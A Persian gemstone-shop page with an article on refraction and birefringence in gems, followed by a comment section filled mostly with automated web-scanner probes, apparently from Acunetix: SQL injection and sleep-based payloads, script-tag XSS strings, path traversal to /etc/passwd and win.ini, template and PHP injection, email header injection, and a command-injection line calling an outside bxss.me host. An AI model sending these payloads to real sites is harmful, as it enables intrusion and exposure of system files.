سامانه پیامکی طلا،سکه،ارز،تلفن گویا صفحه حرفه ای قیمت ها !!! اوقات شرعی وساعات نماز

ویژگی های نوری در گوهرها – قسمت دوم

ویژگی های نوری در گوهرها – قسمت دوم

شکست و دوشکستی:

زمانیکه پرتوی نوری از هوا وارد شی با تراکم متوسط مانند یک سنگ قیمتی شود، بخشی از آن از سطح سنگ بازتاب شده و بخش دیگر آن وارد گوهر می شود.  نوری که وارد گوهر می گردد، حرکت آرامی داشته و در زوایای گوهر خم می شود. تفاوت در سرعت و زاویه بین هوا و سنگ قیمتی نتیجه ای جز شکست را در پی ندارد. این شکست یا خمیدگی نور را می توان اندازه گیری نمود. این اعداد به دست آمده را در اصطلاح ضریب شکست می نامند. این ضریب در تمامی گونه های مختلف سنگ ثابت بوده و به تشخیص آسان گوهر کمک می کند. ضریب شکست بیان گرنسبت سرعت نور در هوا به سرعت نور در سنگ است.

بنابراین اگر سرعت نور در هوا برابر 300 هزار کیلومتر بر ثانیه و سرعت نور در الماس برابر 125 هزار کیلومتر بر ثانیه باشد. آن وقت حاصل تقسیم این دو عدد بر یکدیگر عددی معادل 4/2 را به شما می دهد. این عدد ضریب شکست الماس می باشد. این ضریب شکست به این معنا است که سرعت نور در هوا 4/2 برابر سریعتر از سرعت حرکت نور در الماس است.

هنگامیکه نور به گوهر برخورد می کند به دو پرتوی جداگانه تقسیم شده که هر کدام از این پرتوها در مسیر و سرعت متفاوت در گوهر حرکت می کنند. این حرکت را دو شکستی می نامند. این پدیده بسیار نامتداول بوده و در گونه های مختلف کلسیت که به نام Iceland Spar مشهور است، زیرکن، روتایل و اسفن قابل رؤیت می باشد.

تمامی سنگ های شفاف به 2 قسمت ایزوتروپیک و آنیزوتروپیک تقسیم می گردند. ایزوتروپیک شامل سنگ هایی می شوند که ساختار کریستالی همگرا و یکسانی دارند. هنگامیکه نور در گوهرهای ایزوتروپیک حرکت می کند، در تمامی مسیرها با یک سرعت برابر عبور کرده که این عمل سبب ایجاد تنها یک ضریب شکست در گوهر می شود. به عبارتی تک شکستی یکی از ویژگی های نوری گوهر است در زمانیکه نور در گوهرهای با تراکم متوسط بدون ایجاد تضاد و دوقطبی عبور می کند.
در مقابل هنگامیکه نور از گوهرهای با خاصیت آنیزوتروپیک (ناهمسان) عبور می کند، نور به 2 بخش تقسیم گشته و دو قطبی می شود. در این صورت سنگ دارای خاصیت دو شکستی می گردد. این خاصیت در گوهرهایی رخ می دهد که دارای ساختار 5 یا 6 کریستالی باشند. همانند تتراگونال، اورتورومبیک، هگزاگونال، مونوکلینیک و تری کلینیک. این گوهرهای آنیزوتروپیک این قدرت را دارند تا نور را قطبی کرده و یا موج حرکتی نور را تنها در یک مسیر محدود سازند. سپس از ورود مابقی امواج جلوگیری کرده و نور را به دو پرتو تقسیم می کنند. این دو پرتو در سرعت های گوناگونی از یک زاویه به زاویه دیگر حرکت می نماید.
 

نظرات
ديدگاه هاي ارسال شده توسط شما، پس از تاييد توسط سايت طلا در وب سايت منتشر خواهد شد
0 0

blaeizqzhh 51 سال میگه :

تاریخ: 1399/08/22 ساعت 23:23
Muchas gracias. ?Como puedo iniciar sesion?

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:14
-1);select pg_sleep(22); --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:13
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
if(now()=sysdate(),sleep(7),0)

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
-1" OR 3*2>(0+5+661-661) --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
-1" OR 3+661-661-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
-1" OR 2+661-661-1=0+0+0+1 --

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
-1 OR 3*2>(0+5+603-603)

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
-1 OR 3+603-603-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:12
-1 OR 2+603-603-1=0+0+0+1

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:11
lXUQ9DsZ

0 0

e 51 سال میگه :

تاریخ: 1399/07/20 ساعت 16:09
1????%2527%2522

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
18FMBI[!+!]

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
1CnjBs
PXbm(9502)

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
1}body{acu:Expre/**/SSion(PXbm(9383))}

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
[url=][/url]

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
?

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
1<ScRiPt>PXbm(9767)</sCripT>

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
1u003CScRiPtPXbm(9477)u003C/sCripTu003E

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:54
%31%3C%53%63%52%69%50%74%20%3E%50%58%62%6D%289685%29%3C%2F%73%43%72%69%70%54%3E

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1PXbm(9686)

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1PXbm(9974)

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1PXbm(9092)

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1PXbm(9968)

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1T9KDC[!+!]

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
1PXbm(9374)

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
{{9999197*9999176}}

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
CWS000x?=?1N?
]s??0Q?L

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
acux1751??z1??z2a?bcxuca1751

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
acu2198<s1﹥s2ʺs3ʹuca2198

0 0

mrdkwtor 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
19855294

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

gbfdgcsg 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
/www.vulnweb.com

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:53
................windowswin.ini

0 0

fvqjvidx 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1????%2527%2522

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
????????????????????????????????????????????????windows??win.ini

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
../../../../../../../../../../windows/win.ini.jpg

0 0

fefjhjmg 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
index.php/.

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
C:WINDOWSsystem32driversetchosts

0 0

fefjhjmg 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
index.php

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
../../../../../../../../../../windows/win.ini

0 0

soevflhi 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
${

0 0

svhrprmb 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
WEB-INFweb.xml

0 0

soevflhi 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
";print(md5(acunetix_wvs_security_test));$a="

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
/WEB-INF/web.xml

0 0

soevflhi 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
;print(md5(acunetix_wvs_security_test));

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
WEB-INF/web.xml

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
/../../../../../../../etc/passwd

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52

0 0

pumngshc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
testasp.vulnweb.com

0 0

pumngshc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

pumngshc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
..??..??..??..??..??..??..??..??etc/passwd

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

pumngshc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1some_inexistent_file_with_long_name.jpg

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

pumngshc 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
%2fetc%2fpasswd

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
/etc/passwd

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

ikwcobxq 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
${9999546+9999734}

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

taujmorv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
to
bcc:013405.51-2820.51.9918c.1

0 0

taujmorv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1
bcc:013405.51-2819.51.9918c.1

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
../../../../../../../../../../etc/passwd.jpg

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
../../../../../../../../../../../../../../../proc/version

0 0

lwtcntcr 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
../../../../../../../../../../etc/passwd

0 0

ovtvstyv 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
5Jy8CC1S

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

bgqmwags 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
$(nslookup dns.ce.13405.51-2800.51.9918c.1.bxss.me)

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

bgqmwags 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
set|set&set

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
0

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
-1" OR 2+768-768-1=0+0+0+1 --

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
-1 OR 2+841-841-1=0+0+0+1

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
-1 OR 2+326-326-1=0+0+0+1 --

0 0

uwilsxny 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
3QSXZl1r

0 0

mnjaqeij 51 سال میگه :

تاریخ: 1398/12/09 ساعت 13:52
1

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1VEXYI[!+!]

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1dmz8x
lwFV(9518)

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1}body{acu:Expre/**/SSion(lwFV(9188))}

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
[url=][/url]

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
?

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1<ScRiPt>lwFV(9354)</sCripT>

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1u003CScRiPtlwFV(9450)u003C/sCripTu003E

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
%31%3C%53%63%52%69%50%74%20%3E%6C%77%46%56%289884%29%3C%2F%73%43%72%69%70%54%3E

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1lwFV(9198)

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1lwFV(9848)

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1lwFV(9960)

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1lwFV(9528)

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1ZDARB[!+!]

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:54
1lwFV(9735)

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
{{9999077*10000308}}

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
CWS000x?=?1N?
]s??0Q?L

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
acux7707??z1??z2a?bcxuca7707

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
acu3418<s1﹥s2ʺs3ʹuca3418

0 0

bekrweln 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
19948377

0 0

tpbbmctq 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
/www.vulnweb.com

0 0

xhqimotk 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
1????%2527%2522

0 0

tesphakt 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
index.php/.

0 0

tesphakt 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
index.php

0 0

fogkpypc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
${

0 0

fogkpypc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
";print(md5(acunetix_wvs_security_test));$a="

0 0

fogkpypc 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
;print(md5(acunetix_wvs_security_test));

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
/.\./.\./.\./.\./.\./.\./windows/win.ini

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
................windowswin.ini

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
????????????????????????????????????????????????windows??win.ini

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../../../../../../../../../../windows/win.ini.jpg

0 0

xhavnsyo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
testasp.vulnweb.com

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
C:WINDOWSsystem32driversetchosts

0 0

xhavnsyo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../../../../../../../../../../windows/win.ini

0 0

xhavnsyo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
WEB-INFweb.xml

0 0

xhavnsyo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
1some_inexistent_file_with_long_name.jpg

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
/WEB-INF/web.xml

0 0

rtsuykhp 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
${9999869+9999191}

0 0

xhavnsyo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
WEB-INF/web.xml

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
/../../../../../../../etc/passwd

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
..??..??..??..??..??..??..??..??etc/passwd

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
%2fetc%2fpasswd

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
/etc/passwd

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
0

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
0

0 0

ltdyfmrf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
to
bcc:013405.38-3280.38.6d1dc.1

0 0

ltdyfmrf 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
1
bcc:013405.38-3277.38.6d1dc.1

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../../../../../../../../../../etc/passwd.jpg

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
0

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
0

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../../../../../../../../../../../../../../../proc/version

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
0

0 0

luhacmdl 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
../../../../../../../../../../etc/passwd

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
0

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:53
0

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
0

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
0

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
-1" OR 2+733-733-1=0+0+0+1 --

0 0

nvrvdjdm 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
Io1Zws4u

0 0

mbysroci 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
$(nslookup dns.ce.13405.38-3264.38.6d1dc.1.bxss.me)

0 0

mbysroci 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
set|set&set

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
-1 OR 2+920-920-1=0+0+0+1

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
-1 OR 2+619-619-1=0+0+0+1 --

0 0

lavatqrn 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
FpUWPtYL

0 0

bcvndtno 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:52
1

اخبار سایر رسانه ها